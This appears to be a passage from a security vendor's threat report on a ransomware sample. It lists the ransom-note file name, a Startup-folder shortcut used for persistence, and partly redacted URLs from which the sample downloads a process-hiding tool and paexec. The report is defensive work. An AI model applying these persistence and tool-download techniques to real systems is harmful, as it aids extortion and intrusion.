It leaves text files that serve as ransom notes containing the following:

  • HOW_TO_DECYPHER_FILES.txt

It terminates itself if it finds the following processes in the affected system's memory:

Autostart Technique

This Ransomware drops the following file(s) in the Windows User Startup folder to enable its automatic execution at every system startup:

  • %User Startup%\mystartup.lnk -> points to %User Temp%\HOW_TO_DECYPHER_FILES.txt

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Download Routine

This Ransomware accesses the following websites to download files:

  • https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide32.exe - if 32-bit
  • https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe - if 64-bit
  • https://www.{BLOCKED}dmin.com/paexec/paexec.exe

It saves the files it downloads using the following names:

  • %User Temp%\{random characters}.exe

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)
